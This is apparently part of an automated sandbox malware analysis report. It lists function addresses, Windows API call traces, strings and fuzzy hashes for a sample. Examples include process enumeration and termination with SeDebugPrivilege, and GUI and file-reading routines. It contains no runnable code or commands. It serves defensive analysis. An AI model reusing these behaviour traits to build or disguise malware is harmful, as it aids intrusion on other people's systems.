                                              Function 00BC9B23 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 352COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: NULL Pointer assignment$Not an Object type
                                              • API String ID: 0-572801152
                                              • Opcode ID: 2fc9872176be775d68d4b441feb8247e4f32cf6c65a44cddf5559ba9bebcc7ce
                                              • Instruction ID: ac06626bac59ef6d4b5d4bff63ed29e1398026c5cd538995db3b908c8602549c
                                              • Opcode Fuzzy Hash: 2fc9872176be775d68d4b441feb8247e4f32cf6c65a44cddf5559ba9bebcc7ce
                                              • Instruction Fuzzy Hash: F9C18371A0021AABEF10DF98D888FAEB7F5FB58314F1584ADE915A7280E770DD45CB90
                                              Function 00BC9113 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Variant$ClearInit$_memset
                                              • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                              • API String ID: 2862541840-625585964
                                              • Opcode ID: 74e27b150f7c088c7a490cab3ee64613456daf05293e3043ce0aaa4135755383
                                              • Instruction ID: b02c120ad03f297e1af7d3279ccfe29ae0900379f005dea4c28cfb3b233f5ab6
                                              • Opcode Fuzzy Hash: 74e27b150f7c088c7a490cab3ee64613456daf05293e3043ce0aaa4135755383
                                              • Instruction Fuzzy Hash: EA915E71A00219EBEF24DFA5C888FAEB7F8EF85710F10859DF515AB280D7709945CBA4
                                              Function 00BC975D Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00BA710A: CLSIDFromProgID.COMBASE ref: 00BA7127
                                                • Part of subcall function 00BA710A: ProgIDFromCLSID.COMBASE(?,00000000), ref: 00BA7142
                                                • Part of subcall function 00BA710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00BA7044,80070057,?,?), ref: 00BA7150
                                                • Part of subcall function 00BA710A: CoTaskMemFree.COMBASE(00000000), ref: 00BA7160
                                              • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 00BC9806
                                              • _memset.LIBCMT ref: 00BC9813
                                              • _memset.LIBCMT ref: 00BC9956
                                              • CoCreateInstanceEx.COMBASE(?,00000000,00000015,?,00000001,00000000), ref: 00BC9982
                                              • CoTaskMemFree.COMBASE(?), ref: 00BC998D
                                              Strings
                                              • NULL Pointer assignment, xrefs: 00BC99DB
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                              • String ID: NULL Pointer assignment
                                              • API String ID: 1300414916-2785691316
                                              • Opcode ID: a062cfbf9b24e98e2efb0d357dabc7bc96511ab412fc473348b4146cbaa9e823
                                              • Instruction ID: e220e46b6ca720f2399616ba46ca968407f4e3c98e6427bbd3bb53a240d3846d
                                              • Opcode Fuzzy Hash: a062cfbf9b24e98e2efb0d357dabc7bc96511ab412fc473348b4146cbaa9e823
                                              • Instruction Fuzzy Hash: 93911771D00229EBDB10DFA5DC85EDEBBB9EF09350F20419AF419A7291DB719A44CFA0
                                              Function 00BD6D80 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00BD6E24
                                              • SendMessageW.USER32(?,00001036,00000000,?), ref: 00BD6E38
                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00BD6E52
                                              • _wcscat.LIBCMT ref: 00BD6EAD
                                              • SendMessageW.USER32(?,00001057,00000000,?), ref: 00BD6EC4
                                              • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00BD6EF2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: MessageSend$Window_wcscat
                                              • String ID: SysListView32
                                              • API String ID: 307300125-78025650
                                              • Opcode ID: cb4bbc19a8e63b6e992eae49b9111cdc8440aa379bd2c5f9a200c4fc2d2b7b5c
                                              • Instruction ID: 54435105c8d705264a2a95915483222ea2d25cffa07e8da99b247ccd58f8900e
                                              • Opcode Fuzzy Hash: cb4bbc19a8e63b6e992eae49b9111cdc8440aa379bd2c5f9a200c4fc2d2b7b5c
                                              • Instruction Fuzzy Hash: 61419171A00349ABEB21DF64CC85BEEB7E9EF08350F1044AAF585E72D1E6719D84CB60
                                              Function 00BCE933 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00BB3C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00BB3C7A
                                                • Part of subcall function 00BB3C55: Process32FirstW.KERNEL32(00000000,?), ref: 00BB3C88
                                                • Part of subcall function 00BB3C55: CloseHandle.KERNEL32(00000000), ref: 00BB3D52
                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00BCE9A4
                                              • GetLastError.KERNEL32 ref: 00BCE9B7
                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00BCE9E6
                                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 00BCEA63
                                              • GetLastError.KERNEL32(00000000), ref: 00BCEA6E
                                              • CloseHandle.KERNEL32(00000000), ref: 00BCEAA3
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                              • String ID: SeDebugPrivilege
                                              • API String ID: 2533919879-2896544425
                                              • Opcode ID: ad5fd41ceb5a81f72ffd472ad1f3be7f760b4862ed6feed055bc34268219fc21
                                              • Instruction ID: 2c52e6d997bf8662f19e17aa5353e2a21a35734eef7b36b86a60e74455294348
                                              • Opcode Fuzzy Hash: ad5fd41ceb5a81f72ffd472ad1f3be7f760b4862ed6feed055bc34268219fc21
                                              • Instruction Fuzzy Hash: B44176716042019FDB14EF24C8A5F6ABBE5AF41310F0884A9F9169B2D2DBB5E908CF95
                                              Function 00BB2F94 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • LoadIconW.USER32(00000000,00007F03), ref: 00BB3033
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: IconLoad
                                              • String ID: blank$info$question$stop$warning
                                              • API String ID: 2457776203-404129466
                                              • Opcode ID: eb63b832bf55f156e2493d9bad6061e106f14535279d4e1329078d0dc91556ee
                                              • Instruction ID: 279671bcd3049b663961749dc22a7862fc5ed97b8ff513e96bda0c3e07e1bf67
                                              • Opcode Fuzzy Hash: eb63b832bf55f156e2493d9bad6061e106f14535279d4e1329078d0dc91556ee
                                              • Instruction Fuzzy Hash: 9711053124C386BFE714AB14DC82EFB67DCDF19760B6080AAF904A61C1EAE06F4456A4
                                              Function 00BB42F8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00BB4312
                                              • LoadStringW.USER32(00000000), ref: 00BB4319
                                              • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00BB432F
                                              • LoadStringW.USER32(00000000), ref: 00BB4336
                                              • _wprintf.LIBCMT ref: 00BB435C
                                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00BB437A
                                              Strings
                                              • %s (%d) : ==> %s: %s %s, xrefs: 00BB4357
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: HandleLoadModuleString$Message_wprintf
                                              • String ID: %s (%d) : ==> %s: %s %s
                                              • API String ID: 3648134473-3128320259
                                              • Opcode ID: 3a1ccdc2e7fb3b5d32026e597e78ee804d3e264cd3244780e599d53550b35dda
                                              • Instruction ID: 20859626d56e952e0f7fbd7b6383b2f0537a4cb310b7a21ea06ab51e6c0d136f
                                              • Opcode Fuzzy Hash: 3a1ccdc2e7fb3b5d32026e597e78ee804d3e264cd3244780e599d53550b35dda
                                              • Instruction Fuzzy Hash: 3A0162F2905209BFE71197A4DD89EF6B7ACEB08700F0045B2B74AE3051FA749E858B74
                                              Function 00B52A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON
                                              Download Yara Rule
                                              APIs
                                              • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00B8C1C7,00000004,00000000,00000000,00000000), ref: 00B52ACF
                                              • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00B8C1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00B52B17
                                              • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00B8C1C7,00000004,00000000,00000000,00000000), ref: 00B8C21A
                                              • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00B8C1C7,00000004,00000000,00000000,00000000), ref: 00B8C286
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: ShowWindow
                                              • String ID:
                                              • API String ID: 1268545403-0
                                              • Opcode ID: 0f7febb737811cfc351f27f8d2c7ef838b86785a774296f0308e27d689f3b71c
                                              • Instruction ID: de069cde4ea2fa0b9d9a658cdb92d8343ab329911117e22a3638f6d3a93df752
                                              • Opcode Fuzzy Hash: 0f7febb737811cfc351f27f8d2c7ef838b86785a774296f0308e27d689f3b71c
                                              • Instruction Fuzzy Hash: DD41DB7160AA80DAD7399F28CCD8B7A7FD2EB8B311F1484D9E847475B1C671984DD720
                                              Function 00BB70C6 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • InterlockedExchange.KERNEL32(?,000001F5), ref: 00BB70DD
                                                • Part of subcall function 00B70DB6: std::exception::exception.LIBCMT ref: 00B70DEC
                                                • Part of subcall function 00B70DB6: __CxxThrowException@8.LIBCMT ref: 00B70E01
                                              • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00BB7114
                                              • RtlEnterCriticalSection.NTDLL(?), ref: 00BB7130
                                              • _memmove.LIBCMT ref: 00BB717E
                                              • _memmove.LIBCMT ref: 00BB719B
                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 00BB71AA
                                              • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00BB71BF
                                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 00BB71DE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                              • String ID:
                                              • API String ID: 256516436-0
                                              • Opcode ID: 5ec9a9c7ada74b4f6dc09e5f4215797e4919fc08cbaaeeaeeed45f7f800d37c0
                                              • Instruction ID: 8e6dc94807faaa4660b303ef2cf182f9d24d7464a7e41fe4f9779cac4e0941c8
                                              • Opcode Fuzzy Hash: 5ec9a9c7ada74b4f6dc09e5f4215797e4919fc08cbaaeeaeeed45f7f800d37c0
                                              • Instruction Fuzzy Hash: C2316F31904205EBCF10EFA4DC85AAFB7B8EF45710F1481B6F904AB256EB709E10CBA0
                                              Function 00BD61D3 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • DeleteObject.GDI32(00000000), ref: 00BD61EB
                                              • GetDC.USER32(00000000), ref: 00BD61F3
                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00BD61FE
                                              • ReleaseDC.USER32(00000000,00000000), ref: 00BD620A
                                              • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00BD6246
                                              • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00BD6257
                                              • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00BD902A,?,?,000000FF,00000000,?,000000FF,?), ref: 00BD6291
                                              • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00BD62B1
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                              • String ID:
                                              • API String ID: 3864802216-0
                                              • Opcode ID: 5a63fc2033b27f4c374de811e75b9f3f1545a6a95e47f1fbe4d2f5725050be3e
                                              • Instruction ID: 58320627a38f12c6b31a765718c09a6c68eb357c8a950cf35cfc0ee56b52f80b
                                              • Opcode Fuzzy Hash: 5a63fc2033b27f4c374de811e75b9f3f1545a6a95e47f1fbe4d2f5725050be3e
                                              • Instruction Fuzzy Hash: D5319F72101214BFEB108F10CC8AFFA7BA9EF49761F044066FE099B291EA759C41CB60
                                              Function 00BABBAF Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: _memcmp
                                              • String ID:
                                              • API String ID: 2931989736-0
                                              • Opcode ID: b036e3cbf9fc5c00411bc4e1491a8b980a2c1ce9b9d79ca864571c81e3eb486b
                                              • Instruction ID: b65070f8860553911351b269b4db5a90976c6b27e3f48c14b463a08817441a34
                                              • Opcode Fuzzy Hash: b036e3cbf9fc5c00411bc4e1491a8b980a2c1ce9b9d79ca864571c81e3eb486b
                                              • Instruction Fuzzy Hash: 0C21D4716092057BA304672A9D82FBF73DDEE12358F0884E0FD28A6783FB24DE1185B1
                                              Function 00B51424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2e604f0e3fd85da4e6adbfd466010a07f93b6798e7be2d3f8387d6bed3311909
                                              • Instruction ID: 31349031bf218e576fdf863db0cd4d532f5827a5a06894e70f0980a4d669c65d
                                              • Opcode Fuzzy Hash: 2e604f0e3fd85da4e6adbfd466010a07f93b6798e7be2d3f8387d6bed3311909
                                              • Instruction Fuzzy Hash: 4A716734901109EFCB049F98CC89FBEBBB9FF85311F148599E916AB251D730AA15CFA4
                                              Function 00BDB351 Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • IsWindow.USER32(00F921C0), ref: 00BDB3EB
                                              • IsWindowEnabled.USER32(00F921C0), ref: 00BDB3F7
                                              • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00BDB4DB
                                              • SendMessageW.USER32(00F921C0,000000B0,?,?), ref: 00BDB512
                                              • IsDlgButtonChecked.USER32(?,?), ref: 00BDB54F
                                              • GetWindowLongW.USER32(00F921C0,000000EC), ref: 00BDB571
                                              • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00BDB589
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                              • String ID:
                                              • API String ID: 4072528602-0
